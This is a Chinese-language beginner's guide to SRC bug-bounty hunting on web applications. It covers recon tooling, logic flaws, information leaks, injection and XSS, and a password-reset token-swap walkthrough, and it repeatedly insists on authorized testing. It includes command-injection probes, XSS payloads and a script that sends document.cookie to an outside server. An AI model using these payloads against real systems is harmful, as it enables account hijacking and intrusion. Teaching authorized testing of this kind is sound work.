SRC漏洞挖掘新手入门：从Web应用到实战的完整路径

1. 项目概述：从“无从下手”到“挖洞拿奖”的路径规划

看到“SRC漏洞挖掘”这几个字，很多刚入门安全的朋友，尤其是学生或者刚转行的新人，第一反应往往是既兴奋又迷茫。兴奋的是，这似乎是通往安全圈、证明自己能力、甚至获得真金白银奖励的一条“捷径”；迷茫的是，面对浩如烟海的系统、五花八门的技术，根本不知道从哪里开始，感觉“无门”可入。这种感觉我太熟悉了，十年前我刚接触时也一样，对着一个网站首页发呆半小时，除了点点链接，完全不知道还能做什么。

这篇内容，就是为你打破这个“无门”的状态准备的。它不是一份冷冰冰的技术文档，而是一份基于我个人和身边朋友多年实战经验的“挖洞地图”。我们不去空谈那些高深的二进制漏洞或者复杂的链式攻击，而是聚焦于那些在各大SRC（安全应急响应中心）平台上，真正能让新手快速上手、看到成果的Web应用漏洞。我们的目标非常明确：让你，一个新手，能够按照清晰的思路，找到属于自己的第一个漏洞，并成功提交、获得认可甚至奖励。无论你是信息安全专业的学生，还是对网络安全充满热情的爱好者，只要你具备基本的计算机网络和Web知识（知道什么是HTTP请求、GET和POST的区别），这篇内容就能带你上路。

2. 核心思路拆解：SRC挖洞的“道”与“术”

在动手之前，我们必须先建立正确的认知框架。挖洞不是瞎猫碰死耗子，而是一场有策略的“狩猎”。我把这套策略总结为“道”与“术”的结合。

2.1 “道”：目标选择与心态建设

为什么你总感觉无从下手？很可能是因为你选错了目标。新手最大的误区就是去挑战那些大型互联网公司的核心业务，比如支付宝的支付接口、微信的聊天协议。这些目标防护严密，漏洞挖掘门槛极高，不适合起步。

正确的目标选择策略（新手黄金法则）：

1. 从教育、企业类SRC入手：例如各大高校的EDUSRC、一些传统企业的SRC。这些目标通常存在历史遗留系统多、开发人员安全意识参差不齐、安全投入相对有限的特点，是新手练手的绝佳场所。像“智联SRC好挖吗”这类问题，其本质就是目标选择问题，这类招聘类平台用户交互复杂，确实存在机会，但竞争也激烈，不如先从更垂直的企业SRC开始。
2. 专注于子域名、边缘业务：不要一上来就盯着www.main.com主站。使用工具（如subfinder,amass）收集目标的子域名：oa.main.com（办公系统）、test.main.com（测试环境）、dev.main.com（开发环境）、vpn.main.com（接入系统）等等。这些边缘系统往往是安全体系的薄弱环节。
3. 寻找新上线或改版系统：关注目标的公告、新闻，新上线的功能或刚刚改版的页面，出现逻辑漏洞和配置错误的概率大大增加。

心态建设：

• 放弃“一招致命”的幻想：新手的第一洞，大概率不是一个高危的RCE（远程代码执行）或SQL注入，而可能是一个中危的信息泄露，或一个低危的逻辑缺陷。这非常重要！拿到第一个有效漏洞，建立正反馈，比追求高风险漏洞而一无所获要强一万倍。
• 漏洞的本质是“差异”：你的思路和开发者的思路出现了差异。开发者认为“用户应该这样操作”，而你发现了“用户其实可以那样操作”。培养这种寻找“差异”的思维。
• 合规与授权：绝对、永远只在获得授权的范围内进行测试。SRC平台就是为此而生。在未授权的情况下对系统进行测试，是违法行为。所有思路和手法，都必须在SRC划定的边界内进行。

2.2 “术”：核心漏洞类型与攻击面映射

确定了目标，接下来要明确“找什么”。对于新手，我强烈建议将火力集中在以下几类高产出、易理解的漏洞上，它们占据了SRC提交漏洞的很大比例。

1. 逻辑漏洞（业务逻辑漏洞）这是新手最容易突破，也最能体现“思路”价值的领域。它不依赖复杂的技术，而是依赖于你对业务流程的理解。

• 核心思路：穷举业务流程的每一个环节，问自己“如果我不按规矩出牌，会怎样？”
• 常见场景：
  • 越权访问：垂直越权（普通用户访问管理员功能）、水平越权（用户A访问用户B的数据）。修改请求参数中的ID（如user_id=123改为user_id=124）是经典测试手法。
  • 业务流程绕过：如支付环节，在最后确认订单前拦截请求，尝试修改支付金额为0或负数；验证码绕过，检查验证码是否在前端验证、是否可重复使用、是否为空值绕过。
  • 竞争条件：在短时间内发起大量并发请求，比如“限量优惠券领取”、“余额充值”。可能触发逻辑错误，导致超额领取或充值。
• 实操心得：使用Burp Suite的Repeater和Intruder模块是测试逻辑漏洞的利器。多关注“状态”的改变，比如订单状态、审核状态、权限状态，尝试用请求直接修改它。

2. 信息泄露这类漏洞数量巨大，往往由于开发疏忽或配置不当导致。

• 核心思路：寻找一切本不该被公开访问，但可能因配置错误而暴露的资源。
• 常见场景：
  • 敏感文件泄露：/.git/目录、/.svn/目录、/WEB-INF/web.xml、/.DS_Store、备份文件（.bak,.swp,.old）。
  • 配置信息泄露：错误页面暴露堆栈信息（含路径、代码片段）、默认页面（如phpinfo页面）、配置文件（config.php,.env）可通过路径遍历访问。
  • 接口信息泄露：JS文件（app.js,chunk.js）中可能硬编码API密钥、内部接口地址；通过爬取网站或分析前端代码，发现未鉴权的API接口，直接访问可能泄露数据。
• 实操心得：使用dirsearch、gobuster等目录爆破工具，配合强大的字典（如common.txt,big.txt），是发现这类漏洞的标准流程。同时，养成手动浏览器查看网页源代码的习惯，按Ctrl+U，搜索关键词如api,key,token,password,secret。

3. 注入类漏洞（SQL注入、命令注入等）虽然传统，但远未过时，尤其在老旧系统和企业应用中。

• 核心思路：向所有用户输入点提交非预期数据，观察系统响应是否异常。
• 常见场景：
  • SQL注入：URL参数（?id=1）、搜索框、登录表单。新手可以先使用自动化工具如sqlmap进行初步探测，但一定要学习原理，尝试手动利用，如输入单引号‘看是否报错。
  • 命令注入：多见于网络设备、运维系统的功能点，如“ping测试”、“路由追踪”。输入127.0.0.1; whoami或127.0.0.1 && dir进行测试。
  • 模板注入（SSTI）：如果网站使用了Freemarker、Jinja2等模板引擎，在内容编辑或展示处尝试输入{{7*7}}，如果页面显示49，则存在漏洞。这正对应了热词中“重写freemarker的类”可能涉及的深层风险。
• 注意事项：使用sqlmap等自动化工具一定要谨慎，添加--batch、--level等参数控制扫描深度，避免对目标造成过大压力。在SRC平台测试时，最好先阅读其测试规范，有些平台禁止使用自动化扫描工具。

4. 跨站脚本（XSS）在富文本编辑器、评论、个人信息填写等所有用户可控输入并输出的地方寻找。

• 核心思路：输入一段脚本，看它是否会被浏览器执行。
• 常见场景：反射型XSS（通过URL参数触发）、存储型XSS（提交后存储在数据库，其他用户访问时触发）。最简单的测试payload：<script>alert(1)</script>或<img src=x onerror=alert(1)>。
• 实操心得：不要只弹窗。证明危害是提升漏洞评级的关键。尝试构造窃取Cookie的Payload：<script>fetch('https://你的服务器/steal?cookie='+document.cookie)</script>，并搭建一个简易的HTTP服务来接收，这能证明漏洞的实际危害。

3. 标准作业流程：从信息收集到漏洞提交

有了思路和方向，我们需要一个可重复执行的标准化流程。这套流程能极大提高你的效率和成功率。

3.1 第一阶段：深度信息收集（侦察）

信息收集的广度与深度，直接决定了你攻击面的多少。这部分要花整个流程60%的时间。

1. 子域名枚举：使用工具链。

   # 使用subfinder发现子域 subfinder -d target.com -o subdomains.txt # 使用amass进行深度枚举 amass enum -d target.com -o amass_subs.txt # 合并去重 cat subdomains.txt amass_subs.txt | sort -u > final_subs.txt

2. 端口与服务探测：针对发现的子域名和主域名，探测开放端口。

   # 使用naabu进行快速端口扫描 naabu -l final_subs.txt -o ports.txt # 使用nmap对关键服务进行详细探测 nmap -sV -sC -p 80,443,8080,8443 -iL final_subs.txt -oA nmap_scan

3. Web应用指纹识别：识别网站使用的技术栈（如ThinkPHP, Spring Boot, WordPress），框架和组件的已知漏洞是重要突破口。使用Wappalyzer浏览器插件或whatweb命令。

   whatweb https://target.com

4. 目录与文件爆破：使用dirsearch或ffuf。

   dirsearch -u https://target.com -e php,asp,js,bak,zip,tar.gz -w /path/to/dictionary.txt

5. JS文件分析：这是发现隐藏接口、API密钥的宝藏。可以使用LinkFinder等工具自动化提取，但手动分析往往收获更大。在浏览器开发者工具的“Sources”或“网络”选项卡中查看加载的JS文件。

3.2 第二阶段：漏洞探测与验证

基于收集的信息，开始有针对性的测试。

1. 手动浏览与功能点梳理：将目标网站的所有功能点走一遍，用思维导图记录下来。注册、登录、个人信息修改、订单创建、支付、文件上传、搜索、密码找回……每一个功能点都是一个潜在的测试用例。
2. 代理工具配置：将浏览器流量代理到Burp Suite或OWASP ZAP。确保能拦截到所有HTTP/HTTPS请求。
3. 系统性测试：
   • 每个参数：对拦截到的每一个请求参数（GET/POST/Cookie/Header）都进行篡改测试。
   • 每个接口：尝试未授权访问、越权访问。
   • 每个上传点：尝试上传恶意文件（绕过前端校验、Content-Type校验、文件头校验）。
   • 每个输入点：测试XSS、SQL注入。
4. 工具辅助验证：对于初步怀疑的点，用工具进行深度验证。例如，对一个可能存在SQL注入的参数，用sqlmap跑一下；对一个可能存在敏感目录的站点，用dirsearch再扫一遍深度路径。

3.3 第三阶段：漏洞报告撰写与提交

挖到漏洞只成功了一半，清晰、专业的报告才能让你顺利拿奖。

1. 报告核心要素：
   • 漏洞标题：精炼概括，如“XX系统后台管理页面存在未授权访问漏洞”。
   • 漏洞等级：参考SRC平台定级标准，客观自评（高危、中危、低危）。
   • 漏洞类型：如逻辑漏洞-越权访问。
   • 影响范围：说明受影响的URL、功能模块。
   • 详细步骤：这是最关键的部分！必须提供一步一步、可复现的操作步骤。像写教程一样详细。

     1. 使用账号A（test1/password1）登录系统。
     2. 访问“我的订单”页面，URL为https://target.com/user/order?user_id=1001。
     3. 将URL中的user_id参数修改为1002。
     4. 回车后，成功看到属于账号B（test2）的订单详情。

   • 请求与响应：附上Burp Suite截取的原始HTTP请求和响应包（可适当脱敏），这是最直接的证据。
   • 漏洞证明：提供截图或视频，清晰展示漏洞被利用后的效果（如越权看到他人信息、执行了弹窗等）。
   • 修复建议：给出具体的修复方案，体现你的专业性。例如：“在对user_id参数进行查询前，增加服务端校验，确保当前登录用户的ID与请求的user_id匹配。”
2. 提交平台：国内主流的有补天、漏洞盒子、教育SRC联盟等。关注“补天SRC官网下载”的其实是其漏洞提交平台客户端或插件，用于辅助提交。

4. 新手专属实战：以“密码找回”功能为例

我们以一个最常见的“密码找回”功能为例，手把手走一遍完整的挖掘流程。这个功能逻辑复杂，是逻辑漏洞的富矿。

目标场景：一个在线学习平台study.com的密码找回功能。

测试步骤：

1. 正常流程分析：

   • 点击“忘记密码”，输入注册邮箱user@example.com。
   • 系统提示“重置链接已发送至您的邮箱”。
   • 用户登录邮箱，点击一个包含token的重置链接，如https://study.com/reset?token=abc123def456。
   • 进入重置页面，输入新密码，完成修改。

2. 漏洞挖掘点分析：

   • 点1：邮箱地址是否可篡改？在第一步提交邮箱时，拦截请求，将邮箱改为攻击者的邮箱attacker@evil.com。观察重置链接发往了哪里。如果发到了攻击者邮箱，则直接导致任意用户密码被重置。
   • 点2：验证码是否可绕过？如果在第一步需要输入图形验证码或短信验证码，尝试：
     • 留空验证码提交。
     • 输入一个错误的验证码提交。
     • 重复使用同一个验证码多次提交。
     • 将验证码参数code删除或修改为code=0提交。
   • 点3：Token是否可预测或篡改？收到重置链接https://study.com/reset?token=abc123def456。
     • 预测：尝试将token改为简单数字或规律值，如token=1,token=123456。
     • 篡改：为另一个已知用户（如victim@example.com）发起密码找回，获得他的tokentoken=xyz789。然后，在第一个用户的重置环节，拦截请求，将token替换为第二个用户的token。如果成功，则相当于用A用户的流程重置了B用户的密码。
   • 点4：重置后Token是否失效？用正确流程重置密码后，再次使用同一个token访问重置链接，看是否还能继续修改密码。如果不失效，则存在“密码重置链接复用”漏洞。
   • 点5：最终提交重置的请求是否可越权？在最后一步提交新密码时，拦截请求包。请求中可能包含user_id或username参数。尝试修改这些参数，看能否重置其他用户的密码。

3. 实操记录与证据固定：

   • 使用Burp Suite拦截每一步的请求。
   • 针对点3（Token篡改），我们构造了如下攻击：
     1. 为victim@example.com申请重置，获得Token_A。
     2. 为attacker@evil.com申请重置，获得Token_B。
     3. 在attacker的重置页面（URL带Token_B），拦截提交新密码的POST请求。
     4. 将请求中的token参数值由Token_B替换为Token_A，同时，确保POST数据中的email或user_id参数指向victim@example.com（如果存在）。
     5. 转发请求。
   • 结果：服务器返回“密码重置成功”。而攻击者邮箱并未收到任何链接，却成功重置了受害者的密码。
   • 证据：保存Burp Suite中关键的请求/响应历史记录，并截图整个操作过程的浏览器界面。

4. 报告撰写要点：

   • 标题：“XX学习平台密码找回功能存在Token替换漏洞导致任意用户密码重置”
   • 步骤：将上述第3步的操作，拆解成1、2、3、4、5的详细步骤。
   • 请求包示例：

     POST /api/reset-password HTTP/1.1 Host: study.com Content-Type: application/x-www-form-urlencoded token=Token_A&new_password=Hacked123&confirm_password=Hacked123

   • 修复建议：密码重置Token必须与用户身份强绑定，在验证Token时，需同时校验Token对应的用户ID与当前请求会话中的用户ID是否一致。Token应一次性使用，使用后立即失效。

5. 工具链推荐与高效工作流

工欲善其事，必先利其器。一套顺手的工具能让你事半功倍。

信息收集套件：

• Subfinder/Amass：子域名发现。
• Assetfinder：快速子域名查找。
• Httpx：快速验证子域名存活并获取标题、状态码。
• Naabu/Nmap：端口扫描与服务识别。
• Waybackurls/Gau：从历史存档中获取目标URL，常能发现已下线但仍有用的接口。

漏洞探测与利用：

• Burp Suite Professional：Web安全测试的“瑞士军刀”，社区版也足够新手使用。Repeater（重放）、Intruder（爆破）、Scanner（扫描）是核心模块。
• OWASP ZAP：Burp Suite的免费替代品，功能强大。
• Sqlmap：自动化SQL注入检测与利用。
• XSS Hunter：用于检测盲XSS（Blind XSS）的在线平台，当你插入的XSS payload被触发时，它会通知你，非常适合在输入点广泛测试存储型XSS。

浏览器插件：

• Wappalyzer：识别网站技术栈。
• Hack-Tools：集合了多种Payload、编码解码等功能。
• EditThisCookie：方便地查看和编辑Cookie。

高效工作流建议：

1. 自动化信息收集：编写一个简单的Shell脚本，将subfinder、httpx、waybackurls等工具串联起来，一键输入域名，输出存活的、有趣的URL列表。
2. 重点目标标记：在收集到的URL中，快速筛选出以下特征的目标优先测试：
   • 登录/注册接口
   • 文件上传点
   • 包含api、admin、manage、test、dev关键词的路径
   • 返回200状态码但内容是空或错误的页面（可能是未鉴权的后台）
   • JavaScript文件（.js）
3. 使用Burp Suite的“搜索”功能：将整个站点的流量代理到Burp后，在Proxy历史记录或Site map中，使用搜索功能（Ctrl+F）查找关键词，如password、token、key、id=、upload、delete，能快速定位到潜在的风险点。

6. 常见问题与排查技巧实录

在实际操作中，你一定会遇到各种问题。这里记录一些典型的“坑”和解决方法。

Q1：我按照教程测试了，但什么都找不到，是不是目标太安全了？A1：大概率不是。首先，检查你的测试是否足够“细致”。你是否测试了每一个参数？每一个接口？尝试了每一种HTTP方法（GET, POST, PUT, DELETE）？其次，检查你的思维是否被“常规操作”局限。多问“如果……会怎样？”。最后，扩大攻击面。回到信息收集阶段，看看有没有遗漏的子域名、端口、历史接口。

Q2：使用sqlmap扫描时，网站把我IP封了怎么办？A2：这是新手常犯的错误。在SRC测试中，要文明测试。

• 使用--delay参数设置请求延迟，如--delay=2表示每2秒发一个请求。
• 使用--threads=1降低并发线程数。
• 使用--risk和--level参数从最低级别开始扫描。
• 最重要的是，先手动测试，发现有明显注入迹象（如报错、布尔盲注的差异响应）后，再用sqlmap针对该点进行精准验证，而不是一上来就全盘扫描。

Q3：我找到了一个疑似漏洞的点，但无法稳定复现，有时成功有时失败。A3：这种情况很常见，尤其是在逻辑漏洞中。首先，用Burp Suite完整记录下成功和失败时的所有请求。对比两者差异，可能是一个不起眼的Header（如X-Forwarded-For）、一个Cookie值、或者是请求的时间顺序问题。其次，考虑“竞争条件”，尝试用Burp的Turbo Intruder插件或编写Python脚本进行并发测试。

Q4：提交漏洞后，厂商回复“不予处理”或“已知问题”，怎么办？A4：不要气馁。首先，仔细阅读回复。如果是“不予处理”，检查你的漏洞描述是否清晰，复现步骤是否完整，危害证明是否有力。尝试补充更详细的证据或说明其潜在危害。如果是“已知问题”，可以询问是否已有CVE编号或内部跟踪号，这也能证明你的发现能力。无论如何，保持礼貌和专业，挖掘和报告过程本身就是极佳的学习。

Q5：如何提升漏洞挖掘的“感觉”和深度？A5：除了多练，没有捷径。但有一些方法可以加速这个过程：

• 阅读高质量的漏洞报告：在补天、漏洞盒子等平台的公开漏洞案例中，学习别人的思路和描述方式。看看那些被评为“高危”的漏洞是怎么被发现的。
• 搭建靶场练习：DVWA、WebGoat、Pikachu等Web漏洞靶场，可以让你在合法安全的环境下练习所有技术。
• 代码审计：如果你懂一些开发，尝试阅读开源项目的代码，从源代码层面去理解漏洞是如何产生的。当你看到一段不安全的代码时，你就能立刻想到它在运行时会表现出怎样的漏洞。

挖洞之路，始于思路，成于细节，久于坚持。第一个洞总是最难的，但一旦你凭借自己的思路和手法成功了一次，那种成就感会驱动你走得更远。记住，把每一次测试都当成一次解谜游戏，享受发现“差异”和“突破”的乐趣。安全的世界很大，SRC只是起点，从这里积累的经验、建立的思维，将是你未来职业生涯中最宝贵的财富。